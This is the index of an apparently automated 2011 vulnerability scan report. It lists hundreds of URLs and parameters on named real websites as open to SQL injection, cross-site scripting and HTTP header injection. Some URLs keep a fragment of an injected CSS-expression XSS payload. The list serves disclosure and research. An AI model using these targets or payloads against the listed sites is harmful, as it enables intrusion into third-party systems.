XSS, SQL Injection, Location Response Splitting, Directory Traversal, 10192011-01

DORK, GHDB, BHDB, CWE-79, CAPEC-86, EXAMPLE, POC, REPORT

Report generated by XSS.CX at Sun Oct 23 12:50:45 CDT 2011.


1. SQL injection

1.1. http://www.adidasgolf.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.bing.com/local/details.aspx [SRCHUID cookie]

1.3. http://www.bizfind.us/cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx [REST URL parameter 5]

1.4. http://www.caribbean-ocean.com/get-image.php [id parameter]

1.5. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

1.6. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.7. http://www.insideup.com/wiki/index.php [action parameter]

1.8. http://www.insideup.com/wiki/index.php [title parameter]

1.9. http://www.komonews.com/obits/ [chid parameter]

1.10. http://www.nutter.com/careers.php [CategoryID parameter]

1.11. http://www.quantcast.com/google.com [__utmz cookie]

1.12. http://www.regonline.com/Register/Checkin.aspx [ASP.NET_SessionId cookie]

1.13. https://www.regonline.com/Register/WebResource.axd [CurrentROLSession cookie]

1.14. http://www.reputation.com/ [region cookie]

1.15. http://www.reputation.com/blog/ [region cookie]

1.16. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ [region cookie]

1.17. http://www.reputation.com/contact [region cookie]

1.18. http://www.reputation.com/how_to/ [__utmv cookie]

1.19. http://www.reputation.com/how_to/ [region cookie]

1.20. http://www.reputation.com/how_to/talk-with-your-kids-about-social-media-safety/ [region cookie]

1.21. http://www.reputation.com/itemadded [region cookie]

1.22. http://www.reputation.com/myprivacy [region cookie]

1.23. http://www.reputation.com/services/panelrenderer.php [region cookie]

1.24. https://www.reputation.com/products [region cookie]

1.25. https://www.reputation.com/secure/forgotPassword [region cookie]

1.26. https://www.reputation.com/secure/login [region cookie]

1.27. https://www.reputation.com/secure/login [repdef_ref_code cookie]

1.28. https://www.reputation.com/secure/reg1 [region cookie]

1.29. http://www4.jcpenney.com/jcp/JCPRoute.aspx [REST URL parameter 1]

1.30. http://www4.jcpenney.com/jcp/freeship4u.aspx [REST URL parameter 1]

1.31. http://www5.jcpenney.com/jcp/x6xml.aspx [grptyp parameter]

1.32. http://www5.jcpenney.com/jcp/x6xml.aspx [itemid parameter]

2. File path traversal

3. Cross-site scripting (stored)

3.1. http://www.reputation.com/itemAdded [entityId parameter]

3.2. http://www.reputation.com/itemAdded [entityId parameter]

3.3. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

3.4. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

3.5. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

3.6. http://www.reputation.com/services/panelrenderer.php [entityId parameter]

4. HTTP header injection

4.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]

4.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]

4.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]

4.4. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

5. Cross-site scripting (reflected)

5.1. http://www.4shared.com/advertise/ [REST URL parameter 1]

5.2. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1]

5.3. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2]

5.4. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3]

5.5. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4]

5.6. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1]

5.7. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2]

5.8. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3]

5.9. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4]

5.10. http://www.4shared.com/contact.jsp [REST URL parameter 1]

5.11. http://www.4shared.com/css/common.css [REST URL parameter 1]

5.12. http://www.4shared.com/css/common.css [REST URL parameter 2]

5.13. http://www.4shared.com/css/main.css [REST URL parameter 1]

5.14. http://www.4shared.com/css/main.css [REST URL parameter 2]

5.15. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

5.16. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

5.17. http://www.4shared.com/desktop/ [REST URL parameter 1]

5.18. http://www.4shared.com/enter.jsp [REST URL parameter 1]

5.19. http://www.4shared.com/enter.jsp [au parameter]

5.20. http://www.4shared.com/faq.jsp [REST URL parameter 1]

5.21. http://www.4shared.com/favicon.ico [REST URL parameter 1]

5.22. http://www.4shared.com/icons/16x16/ [REST URL parameter 1]

5.23. http://www.4shared.com/icons/16x16/ [REST URL parameter 2]

5.24. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1]

5.25. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2]

5.26. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1]

5.27. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2]

5.28. http://www.4shared.com/images/spacer.gif [REST URL parameter 1]

5.29. http://www.4shared.com/images/spacer.gif [REST URL parameter 2]

5.30. http://www.4shared.com/index.jsp [REST URL parameter 1]

5.31. http://www.4shared.com/js/index.js [REST URL parameter 1]

5.32. http://www.4shared.com/js/index.js [REST URL parameter 2]

5.33. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

5.34. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

5.35. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

5.36. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

5.37. http://www.4shared.com/loginBox.jsp [REST URL parameter 1]

5.38. http://www.4shared.com/m/android.jsp [REST URL parameter 1]

5.39. http://www.4shared.com/m/android.jsp [REST URL parameter 2]

5.40. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1]

5.41. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2]

5.42. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1]

5.43. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2]

5.44. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1]

5.45. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2]

5.46. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3]

5.47. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1]

5.48. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2]

5.49. http://www.4shared.com/premium.jsp [REST URL parameter 1]

5.50. http://www.4shared.com/press_room/ [REST URL parameter 1]

5.51. http://www.4shared.com/privacy.jsp [REST URL parameter 1]

5.52. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1]

5.53. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1]

5.54. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1]

5.55. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1]

5.56. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1]

5.57. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1]

5.58. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1]

5.59. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1]

5.60. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

5.61. http://www.4shared.com/resellers.jsp [REST URL parameter 1]

5.62. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 1]

5.63. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 2]

5.64. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

5.65. http://www.4shared.com/signUpBox.jsp [df parameter]

5.66. http://www.4shared.com/signup.jsp [REST URL parameter 1]

5.67. http://www.4shared.com/terms.jsp [REST URL parameter 1]

5.68. http://www.4shared.com/toolbar/ [REST URL parameter 1]

5.69. http://www.addthis.com/bookmark.php [REST URL parameter 1]

5.70. http://www.addthis.com/bookmark.php [REST URL parameter 1]

5.71. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

5.72. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

5.73. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

5.74. http://www.barracudanetworks.com/ns/company/ [name of an arbitrarily supplied request parameter]

5.75. http://www.barracudanetworks.com/ns/privacy/ [name of an arbitrarily supplied request parameter]

5.76. http://www.barracudanetworks.com/ns/products/ [name of an arbitrarily supplied request parameter]

5.77. http://www.barracudanetworks.com/ns/products/index.php [name of an arbitrarily supplied request parameter]

5.78. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php [name of an arbitrarily supplied request parameter]

5.79. http://www.barracudanetworks.com/ns/products/spam_overview.php [name of an arbitrarily supplied request parameter]

5.80. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php [name of an arbitrarily supplied request parameter]

5.81. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php [name of an arbitrarily supplied request parameter]

5.82. http://www.barracudanetworks.com/ns/purchase/ [name of an arbitrarily supplied request parameter]

5.83. https://www.barracudanetworks.com/ns/products/request_eval_unit.php [name of an arbitrarily supplied request parameter]

5.84. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

5.85. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

5.86. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

5.87. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

5.88. http://www.bizfind.us/Index.asp [name of an arbitrarily supplied request parameter]

5.89. http://www.bizfind.us/impressum.asp [name of an arbitrarily supplied request parameter]

5.90. http://www.bizfind.us/privacy.asp [name of an arbitrarily supplied request parameter]

5.91. http://www.bizfind.us/pubblicita.asp [name of an arbitrarily supplied request parameter]

5.92. http://www.bizfind.us/search.asp [cerca parameter]

5.93. http://www.bizfind.us/search.asp [cerco parameter]

5.94. http://www.bizfind.us/sitemap.asp [name of an arbitrarily supplied request parameter]

5.95. http://www.bluefountainmedia.com/blog [name of an arbitrarily supplied request parameter]

5.96. http://www.bluefountainmedia.com/blog/ [name of an arbitrarily supplied request parameter]

5.97. http://www.bluefountainmedia.com/business [name of an arbitrarily supplied request parameter]

5.98. http://www.bluefountainmedia.com/business/ [name of an arbitrarily supplied request parameter]

5.99. http://www.briangardner.com/ [name of an arbitrarily supplied request parameter]

5.100. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

5.101. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

5.102. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

5.103. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 2]

5.104. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 3]

5.105. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 2]

5.106. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 3]

5.107. http://www.caribbean-ocean.com/enq.php/stylesheet.css [REST URL parameter 2]

5.108. http://www.caribbean-ocean.com/get-image.php [id parameter]

5.109. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

5.110. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

5.111. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

5.112. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

5.113. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 2]

5.114. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 3]

5.115. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 2]

5.116. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 3]

5.117. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css [REST URL parameter 2]

5.118. http://www.coach.com/online/handbags/Home-10551-10051 [REST URL parameter 3]

5.119. http://www.coach.com/online/handbags/Home-10551-10051 [REST URL parameter 3]

5.120. http://www.coach.com/online/handbags/PopUnderView [catalogId parameter]

5.121. http://www.coach.com/online/handbags/PopUnderView [popunder parameter]

5.122. http://www.coach.com/online/handbags/PopUnderView [storeId parameter]

5.123. http://www.coach.com/online/handbags/PopUnderView [storeId parameter]

5.124. http://www.conduit-banners.com/drawtoolbar/ [culture parameter]

5.125. https://www.demandstudios.com/application.html [role parameter]

5.126. http://www.digitalbond.com/2008/07/20/managing-your-security-career/ [REST URL parameter 4]

5.127. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 1]

5.128. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 2]

5.129. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 3]

5.130. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 4]

5.131. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 5]

5.132. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 6]

5.133. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

5.134. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.135. http://www.google.com/search [tch parameter]

5.136. http://www.insideup.com/forgotPassword.html [username parameter]

5.137. http://www.insideup.com/login.html [password parameter]

5.138. http://www.insideup.com/login.html [username parameter]

5.139. http://www.insideup.com/updateCity.html [city parameter]

5.140. http://www.insideup.com/wiki/index.php [action parameter]

5.141. http://www.intensedebate.com/js/getCommentLink.php [REST URL parameter 2]

5.142. http://www.intensedebate.com/js/getCommentLink.php [name of an arbitrarily supplied request parameter]

5.143. http://www.intensedebate.com/js/getCommentLink.php [postid parameter]

5.144. http://www.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

5.145. http://www.jotform.com/favicon.ico [REST URL parameter 1]

5.146. http://www.jotform.com/form/2910946098 [REST URL parameter 1]

5.147. http://www.komonews.com/home/video/116474128.html [name of an arbitrarily supplied request parameter]

5.148. http://www.komonews.com/home/video/116545678.html [name of an arbitrarily supplied request parameter]

5.149. http://www.komonews.com/home/video/116673784.html [name of an arbitrarily supplied request parameter]

5.150. http://www.komonews.com/home/video/116675584.html [name of an arbitrarily supplied request parameter]

5.151. http://www.komonews.com/home/video/116675749.html [name of an arbitrarily supplied request parameter]

5.152. http://www.komonews.com/home/video/116702184.html [name of an arbitrarily supplied request parameter]

5.153. http://www.komonews.com/news/116650859.html [name of an arbitrarily supplied request parameter]

5.154. http://www.komonews.com/news/116650859.html [skipthumb parameter]

5.155. http://www.komonews.com/news/116652534.html [name of an arbitrarily supplied request parameter]

5.156. http://www.komonews.com/news/116694569.html [name of an arbitrarily supplied request parameter]

5.157. http://www.komonews.com/news/116694569.html [skipthumb parameter]

5.158. http://www.komonews.com/news/116694614.html [name of an arbitrarily supplied request parameter]

5.159. http://www.komonews.com/news/116707379.html [name of an arbitrarily supplied request parameter]

5.160. http://www.komonews.com/news/116727124.html [name of an arbitrarily supplied request parameter]

5.161. http://www.komonews.com/news/boeing/116707614.html [name of an arbitrarily supplied request parameter]

5.162. http://www.komonews.com/news/business/116735244.html [name of an arbitrarily supplied request parameter]

5.163. http://www.komonews.com/news/business/116739564.html [name of an arbitrarily supplied request parameter]

5.164. http://www.komonews.com/news/business/116739939.html [name of an arbitrarily supplied request parameter]

5.165. http://www.komonews.com/news/business/116740159.html [name of an arbitrarily supplied request parameter]

5.166. http://www.komonews.com/news/business/116740389.html [name of an arbitrarily supplied request parameter]

5.167. http://www.komonews.com/news/consumer/116673109.html [name of an arbitrarily supplied request parameter]

5.168. http://www.komonews.com/news/consumer/116704069.html [name of an arbitrarily supplied request parameter]

5.169. http://www.komonews.com/news/entertainment/116123569.html [name of an arbitrarily supplied request parameter]

5.170. http://www.komonews.com/news/entertainment/116189709.html [name of an arbitrarily supplied request parameter]

5.171. http://www.komonews.com/news/entertainment/116665019.html [name of an arbitrarily supplied request parameter]

5.172. http://www.komonews.com/news/entertainment/116680394.html [name of an arbitrarily supplied request parameter]

5.173. http://www.komonews.com/news/entertainment/116692424.html [name of an arbitrarily supplied request parameter]

5.174. http://www.komonews.com/news/entertainment/116704174.html [name of an arbitrarily supplied request parameter]

5.175. http://www.komonews.com/news/entertainment/116707059.html [name of an arbitrarily supplied request parameter]

5.176. http://www.komonews.com/news/entertainment/116707059.html [ref parameter]

5.177. http://www.komonews.com/news/entertainment/116710289.html [name of an arbitrarily supplied request parameter]

5.178. http://www.komonews.com/news/entertainment/116737029.html [name of an arbitrarily supplied request parameter]

5.179. http://www.komonews.com/news/entertainment/116737029.html [ref parameter]

5.180. http://www.komonews.com/news/entertainment/116737724.html [name of an arbitrarily supplied request parameter]

5.181. http://www.komonews.com/news/entertainment/116737724.html [ref parameter]

5.182. http://www.komonews.com/news/health/116753189.html [name of an arbitrarily supplied request parameter]

5.183. http://www.komonews.com/news/local/116231884.html [name of an arbitrarily supplied request parameter]

5.184. http://www.komonews.com/news/local/116509853.html [name of an arbitrarily supplied request parameter]

5.185. http://www.komonews.com/news/local/116694614.html [name of an arbitrarily supplied request parameter]

5.186. http://www.komonews.com/news/local/116703604.html [name of an arbitrarily supplied request parameter]

5.187. http://www.komonews.com/news/local/116703604.html [skipthumb parameter]

5.188. http://www.komonews.com/news/local/116703604.html [tab parameter]

5.189. http://www.komonews.com/news/local/116706579.html [name of an arbitrarily supplied request parameter]

5.190. http://www.komonews.com/news/local/116707379.html [name of an arbitrarily supplied request parameter]

5.191. http://www.komonews.com/news/local/116712649.html [name of an arbitrarily supplied request parameter]

5.192. http://www.komonews.com/news/local/116714899.html [name of an arbitrarily supplied request parameter]

5.193. http://www.komonews.com/news/local/116727124.html [name of an arbitrarily supplied request parameter]

5.194. http://www.komonews.com/news/local/116745309.html [name of an arbitrarily supplied request parameter]

5.195. http://www.komonews.com/news/local/116752479.html [name of an arbitrarily supplied request parameter]

5.196. http://www.komonews.com/news/local/116755469.html [name of an arbitrarily supplied request parameter]

5.197. http://www.komonews.com/news/national/115640079.html [name of an arbitrarily supplied request parameter]

5.198. http://www.komonews.com/news/national/116404039.html [name of an arbitrarily supplied request parameter]

5.199. http://www.komonews.com/news/national/116502428.html [name of an arbitrarily supplied request parameter]

5.200. http://www.komonews.com/news/national/116713504.html [name of an arbitrarily supplied request parameter]

5.201. http://www.komonews.com/news/national/116734714.html [name of an arbitrarily supplied request parameter]

5.202. http://www.komonews.com/news/national/116736489.html [name of an arbitrarily supplied request parameter]

5.203. http://www.komonews.com/news/national/116736624.html [name of an arbitrarily supplied request parameter]

5.204. http://www.komonews.com/news/national/116747399.html [name of an arbitrarily supplied request parameter]

5.205. http://www.komonews.com/news/national/116750534.html [name of an arbitrarily supplied request parameter]

5.206. http://www.komonews.com/news/national/116750784.html [name of an arbitrarily supplied request parameter]

5.207. http://www.komonews.com/news/offbeat/116565253.html [name of an arbitrarily supplied request parameter]

5.208. http://www.komonews.com/news/offbeat/116611588.html [name of an arbitrarily supplied request parameter]

5.209. http://www.komonews.com/news/offbeat/116622758.html [name of an arbitrarily supplied request parameter]

5.210. http://www.komonews.com/news/offbeat/116623473.html [name of an arbitrarily supplied request parameter]

5.211. http://www.komonews.com/news/offbeat/116690659.html [name of an arbitrarily supplied request parameter]

5.212. http://www.komonews.com/news/offbeat/116708664.html [name of an arbitrarily supplied request parameter]

5.213. http://www.komonews.com/news/offbeat/116708664.html [ref parameter]

5.214. http://www.komonews.com/news/offbeat/116708719.html [name of an arbitrarily supplied request parameter]

5.215. http://www.komonews.com/news/offbeat/116708719.html [ref parameter]

5.216. http://www.komonews.com/news/offbeat/116749349.html [name of an arbitrarily supplied request parameter]

5.217. http://www.komonews.com/news/offbeat/116749349.html [ref parameter]

5.218. http://www.komonews.com/news/tech/116596303.html [name of an arbitrarily supplied request parameter]

5.219. http://www.komonews.com/news/tech/116609493.html [name of an arbitrarily supplied request parameter]

5.220. http://www.komonews.com/news/tech/116666119.html [name of an arbitrarily supplied request parameter]

5.221. http://www.komonews.com/news/tech/116674969.html [name of an arbitrarily supplied request parameter]

5.222. http://www.komonews.com/news/tech/116740874.html [name of an arbitrarily supplied request parameter]

5.223. http://www.komonews.com/news/tech/116748424.html [name of an arbitrarily supplied request parameter]

5.224. http://www.komonews.com/obits [name of an arbitrarily supplied request parameter]

5.225. http://www.komonews.com/obits/ [chid parameter]

5.226. http://www.komonews.com/obits/ [name of an arbitrarily supplied request parameter]

5.227. http://www.komonews.com/opinion/kenschram/116741919.html [name of an arbitrarily supplied request parameter]

5.228. http://www.komonews.com/sports/116570948.html [name of an arbitrarily supplied request parameter]

5.229. http://www.komonews.com/sports/116572113.html [name of an arbitrarily supplied request parameter]

5.230. http://www.komonews.com/sports/116601093.html [name of an arbitrarily supplied request parameter]

5.231. http://www.komonews.com/sports/116612208.html [name of an arbitrarily supplied request parameter]

5.232. http://www.komonews.com/sports/116713754.html [name of an arbitrarily supplied request parameter]

5.233. http://www.komonews.com/younews [c parameter]

5.234. http://www.komonews.com/younews [cid parameter]

5.235. http://www.komonews.com/younews [name of an arbitrarily supplied request parameter]

5.236. http://www.lesechos.fr/investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htm [REST URL parameter 3]

5.237. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

5.238. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

5.239. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

5.240. http://www.ndbc.noaa.gov/rss/ndbc_obs_search.php [name of an arbitrarily supplied request parameter]

5.241. http://www.nutter.com/attorneys.php [AttorneyID parameter]

5.242. http://www.nutter.com/careers.php [CategoryID parameter]

5.243. http://www.quantcast.com/4shared.com [REST URL parameter 1]

5.244. http://www.quantcast.com/about.com [REST URL parameter 1]

5.245. http://www.quantcast.com/ad4game.com [REST URL parameter 1]

5.246. http://www.quantcast.com/adobe.com [REST URL parameter 1]

5.247. http://www.quantcast.com/allrecipes.com [REST URL parameter 1]

5.248. http://www.quantcast.com/amazon.com [REST URL parameter 1]

5.249. http://www.quantcast.com/ancestry.com [REST URL parameter 1]

5.250. http://www.quantcast.com/angelfire.com [REST URL parameter 1]

5.251. http://www.quantcast.com/answerbag.com [REST URL parameter 1]

5.252. http://www.quantcast.com/answers.com [REST URL parameter 1]

5.253. http://www.quantcast.com/aol.com [REST URL parameter 1]

5.254. http://www.quantcast.com/apple.com [REST URL parameter 1]

5.255. http://www.quantcast.com/articlesbase.com [REST URL parameter 1]

5.256. http://www.quantcast.com/ask.com [REST URL parameter 1]

5.257. http://www.quantcast.com/askmen.com [REST URL parameter 1]

5.258. http://www.quantcast.com/associatedcontent.com [REST URL parameter 1]

5.259. http://www.quantcast.com/att.com [REST URL parameter 1]

5.260. http://www.quantcast.com/autotrader.com [REST URL parameter 1]

5.261. http://www.quantcast.com/babycenter.com [REST URL parameter 1]

5.262. http://www.quantcast.com/bankofamerica.com [REST URL parameter 1]

5.263. http://www.quantcast.com/barnesandnoble.com [REST URL parameter 1]

5.264. http://www.quantcast.com/bbc.co.uk [REST URL parameter 1]

5.265. http://www.quantcast.com/bestbuy.com [REST URL parameter 1]

5.266. http://www.quantcast.com/bing.com [REST URL parameter 1]

5.267. http://www.quantcast.com/bizrate.com [REST URL parameter 1]

5.268. http://www.quantcast.com/blogger.com [REST URL parameter 1]

5.269. http://www.quantcast.com/blogspot.com [REST URL parameter 1]

5.270. http://www.quantcast.com/blurtit.com [REST URL parameter 1]

5.271. http://www.quantcast.com/borders.com [REST URL parameter 1]

5.272. http://www.quantcast.com/boreme.com [REST URL parameter 1]

5.273. http://www.quantcast.com/brothersoft.com [REST URL parameter 1]

5.274. http://www.quantcast.com/buycheapr.com [REST URL parameter 1]

5.275. http://www.quantcast.com/ca.gov [REST URL parameter 1]

5.276. http://www.quantcast.com/candystand.com [REST URL parameter 1]

5.277. http://www.quantcast.com/capitalone.com [REST URL parameter 1]

5.278. http://www.quantcast.com/careerbuilder.com [REST URL parameter 1]

5.279. http://www.quantcast.com/cbssports.com [REST URL parameter 1]

5.280. http://www.quantcast.com/chacha.com [REST URL parameter 1]

5.281. http://www.quantcast.com/chase.com [REST URL parameter 1]

5.282. http://www.quantcast.com/cnbc.com [REST URL parameter 1]

5.283. http://www.quantcast.com/cnet.com [REST URL parameter 1]

5.284. http://www.quantcast.com/cnn.com [REST URL parameter 1]

5.285. http://www.quantcast.com/comcast.com [REST URL parameter 1]

5.286. http://www.quantcast.com/comcast.net [REST URL parameter 1]

5.287. http://www.quantcast.com/coolmath-games.com [REST URL parameter 1]

5.288. http://www.quantcast.com/craigslist.org [REST URL parameter 1]

5.289. http://www.quantcast.com/dailymotion.com [REST URL parameter 1]

5.290. http://www.quantcast.com/dell.com [REST URL parameter 1]

5.291. http://www.quantcast.com/deviantart.com [REST URL parameter 1]

5.292. http://www.quantcast.com/digg.com [REST URL parameter 1]

5.293. http://www.quantcast.com/directv.com [REST URL parameter 1]

5.294. http://www.quantcast.com/discovery.com [REST URL parameter 1]

5.295. http://www.quantcast.com/docstoc.com [REST URL parameter 1]

5.296. http://www.quantcast.com/drudgereport.com [REST URL parameter 1]

5.297. http://www.quantcast.com/drugs.com [REST URL parameter 1]

5.298. http://www.quantcast.com/ebay.com [REST URL parameter 1]

5.299. http://www.quantcast.com/edmunds.com [REST URL parameter 1]

5.300. http://www.quantcast.com/ehow.com [REST URL parameter 1]

5.301. http://www.quantcast.com/etsy.com [REST URL parameter 1]

5.302. http://www.quantcast.com/evite.com [REST URL parameter 1]

5.303. http://www.quantcast.com/ew.com [REST URL parameter 1]

5.304. http://www.quantcast.com/examiner.com [REST URL parameter 1]

5.305. http://www.quantcast.com/expedia.com [REST URL parameter 1]

5.306. http://www.quantcast.com/ezinearticles.com [REST URL parameter 1]

5.307. http://www.quantcast.com/facebook.com [REST URL parameter 1]

5.308. http://www.quantcast.com/fedex.com [REST URL parameter 1]

5.309. http://www.quantcast.com/filestube.com [REST URL parameter 1]

5.310. http://www.quantcast.com/filmannex.com [REST URL parameter 1]

5.311. http://www.quantcast.com/fixya.com [REST URL parameter 1]

5.312. http://www.quantcast.com/flickr.com [REST URL parameter 1]

5.313. http://www.quantcast.com/foodnetwork.com [REST URL parameter 1]

5.314. http://www.quantcast.com/formspring.me [REST URL parameter 1]

5.315. http://www.quantcast.com/foxnews.com [REST URL parameter 1]

5.316. http://www.quantcast.com/gawker.com [REST URL parameter 1]

5.317. http://www.quantcast.com/global/personalHeader [REST URL parameter 1]

5.318. http://www.quantcast.com/global/personalHeader [REST URL parameter 2]

5.319. http://www.quantcast.com/go.com [REST URL parameter 1]

5.320. http://www.quantcast.com/godaddy.com [REST URL parameter 1]

5.321. http://www.quantcast.com/google.com [REST URL parameter 1]

5.322. http://www.quantcast.com/grindtv.com [REST URL parameter 1]

5.323. http://www.quantcast.com/healthgrades.com [REST URL parameter 1]

5.324. http://www.quantcast.com/homedepot.com [REST URL parameter 1]

5.325. http://www.quantcast.com/howstuffworks.com [REST URL parameter 1]

5.326. http://www.quantcast.com/hp.com [REST URL parameter 1]

5.327. http://www.quantcast.com/hubpages.com [REST URL parameter 1]

5.328. http://www.quantcast.com/huffingtonpost.com [REST URL parameter 1]

5.329. http://www.quantcast.com/hulu.com [REST URL parameter 1]

5.330. http://www.quantcast.com/ign.com [REST URL parameter 1]

5.331. http://www.quantcast.com/imdb.com [REST URL parameter 1]

5.332. http://www.quantcast.com/indeed.com [REST URL parameter 1]

5.333. http://www.quantcast.com/intuit.com [REST URL parameter 1]

5.334. http://www.quantcast.com/irs.gov [REST URL parameter 1]

5.335. http://www.quantcast.com/js/top-sites.js [REST URL parameter 1]

5.336. http://www.quantcast.com/js/top-sites.js [REST URL parameter 2]

5.337. http://www.quantcast.com/justanswer.com [REST URL parameter 1]

5.338. http://www.quantcast.com/kohls.com [REST URL parameter 1]

5.339. http://www.quantcast.com/komonews.com [REST URL parameter 1]

5.340. http://www.quantcast.com/legacy.com [REST URL parameter 1]

5.341. http://www.quantcast.com/linkedin.com [REST URL parameter 1]

5.342. http://www.quantcast.com/live.com [REST URL parameter 1]

5.343. http://www.quantcast.com/local.com [REST URL parameter 1]

5.344. http://www.quantcast.com/localpages.com [REST URL parameter 1]

5.345. http://www.quantcast.com/lowes.com [REST URL parameter 1]

5.346. http://www.quantcast.com/manta.com [REST URL parameter 1]

5.347. http://www.quantcast.com/mapquest.com [REST URL parameter 1]

5.348. http://www.quantcast.com/match.com [REST URL parameter 1]

5.349. http://www.quantcast.com/mayoclinic.com [REST URL parameter 1]

5.350. http://www.quantcast.com/medicinenet.com [REST URL parameter 1]

5.351. http://www.quantcast.com/microsoft.com [REST URL parameter 1]

5.352. http://www.quantcast.com/miniclip.com [REST URL parameter 1]

5.353. http://www.quantcast.com/monster.com [REST URL parameter 1]

5.354. http://www.quantcast.com/moviefone.com [REST URL parameter 1]

